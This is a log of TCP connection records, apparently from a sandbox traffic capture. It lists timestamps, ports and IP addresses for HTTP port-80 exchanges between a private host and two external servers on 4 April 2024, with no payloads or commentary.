Apr 4, 2024 17:48:51.077986956 CEST	49712	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.133130074 CEST	49713	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.359565020 CEST	80	49712	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:51.416565895 CEST	80	49713	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:51.416646004 CEST	49713	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.417166948 CEST	49713	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.417186022 CEST	49713	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.701244116 CEST	80	49713	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:51.716804028 CEST	80	49713	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:51.720105886 CEST	49713	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.720237017 CEST	49713	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.729721069 CEST	49714	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.003490925 CEST	80	49713	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.006747961 CEST	80	49714	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.008213043 CEST	49714	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.008408070 CEST	49714	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.008436918 CEST	49714	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.285382986 CEST	80	49714	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.298906088 CEST	80	49714	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.299040079 CEST	49714	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.299123049 CEST	49714	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.301959038 CEST	49715	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.576081038 CEST	80	49714	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.580200911 CEST	80	49715	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.580749035 CEST	49715	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.580955029 CEST	49715	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.580965042 CEST	49715	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.859308004 CEST	80	49715	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.874041080 CEST	80	49715	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:52.874170065 CEST	49715	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.874269962 CEST	49715	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:52.877173901 CEST	49716	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:53.152556896 CEST	80	49715	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:53.159224033 CEST	80	49716	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:53.159327030 CEST	49716	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:53.159481049 CEST	49716	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:53.159562111 CEST	49716	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:53.441437960 CEST	80	49716	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:53.441452026 CEST	80	49716	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:53.456214905 CEST	80	49716	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:53.456280947 CEST	49716	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:53.457247019 CEST	49716	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:53.649111986 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:53.739105940 CEST	80	49716	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:53.820313931 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:53.820485115 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:53.820676088 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.051368952 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.571254969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.571307898 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.571324110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.571363926 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.571609974 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.571621895 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.571650028 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.611740112 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.743307114 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.743366003 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.743380070 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.743393898 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.743467093 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.743477106 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.743546009 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.743563890 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.743601084 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.743733883 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.799385071 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.914304018 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914514065 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914586067 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.914602041 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914742947 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914787054 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.914829969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914892912 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914932966 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.914954901 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.914983034 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.915021896 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.915060043 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.915116072 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.915155888 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.915163040 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.915227890 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.915265083 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:54.970170021 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.970192909 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:54.970356941 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.085483074 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.085566044 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.085625887 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.085633039 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.085684061 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.085737944 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.085752010 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.085771084 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.085813046 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.146080017 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146096945 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146147013 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146209002 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.146521091 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146581888 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.146585941 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146612883 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146650076 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.146687984 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146724939 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146735907 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146766901 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.146830082 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146842003 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146868944 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.146913052 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146925926 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.146955013 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.147034883 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.147089958 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.147108078 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.147145987 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.147183895 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.149761915 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.149976969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.149990082 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150002956 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150022984 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.150047064 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.150197029 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150208950 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150266886 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.150432110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150593996 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150607109 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150643110 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.150708914 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150744915 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150752068 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.150819063 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150854111 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.150859118 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.205522060 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.256484032 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256511927 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256526947 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256565094 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256587982 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256606102 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.256653070 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.256720066 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256735086 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256750107 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.256757021 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.256784916 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.256963015 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.257009029 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.257051945 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.257102013 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.299284935 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.316932917 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.316951990 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.316967964 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.316979885 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317054987 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.317097902 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317217112 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317259073 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.317291975 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317306042 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317327023 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317339897 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.317346096 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.317384958 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.433635950 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.433659077 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.433727980 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.433836937 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.433851004 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.433931112 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.433933973 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.433983088 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.433999062 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434012890 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434041023 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434046030 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.434046030 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.434056044 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434079885 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434091091 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434103012 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.434149981 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.434185982 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434199095 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434211016 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.434232950 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.436460972 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436573982 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436592102 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436608076 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.436644077 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.436674118 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436794043 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436810017 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436847925 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.436918020 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436964035 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.436969042 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436981916 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.436995029 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437027931 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437062979 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437073946 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437087059 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437098980 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437133074 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437155008 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437169075 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437181950 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437206984 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437323093 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437335968 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437365055 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437433958 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437449932 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437478065 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437700033 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.437742949 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.437829018 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438074112 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438116074 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.438138008 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438173056 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438214064 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.438338041 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438350916 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438400030 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.438467026 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438596010 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438642979 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.438678026 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438862085 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438875914 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438905001 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.438961983 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.438975096 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439002991 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.439078093 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439090967 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439119101 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.439205885 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439222097 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439254045 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.439284086 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439306021 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439353943 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.439367056 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439407110 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.439557076 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439601898 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439655066 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.439718008 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439862013 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439908981 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.439910889 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.486756086 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.487854958 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.487932920 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.487978935 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.488084078 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488200903 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488250971 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.488331079 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488346100 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488384008 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.488415003 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488456964 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488471031 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488487005 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.488496065 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.488540888 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.721534014 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.721580982 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.721595049 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.721637011 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722027063 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722076893 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722219944 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722240925 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722310066 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722433090 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722445011 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722477913 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722484112 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722496033 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722537041 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722565889 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722578049 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722601891 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722614050 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.722615957 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722651958 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.722807884 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.723825932 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.723839045 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.723853111 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.723917007 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.723917007 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.724117041 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724131107 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724194050 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.724345922 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724735022 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724746943 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724786043 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.724805117 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724817038 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724859953 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.724935055 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.724986076 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725017071 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.725085974 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725128889 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.725208998 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725219965 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725276947 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.725315094 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725450993 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725464106 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725502968 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725517988 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:55.725539923 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725552082 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725564957 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:55.725567102 CEST	49717	80	192.168.2.10	190.249.187.165
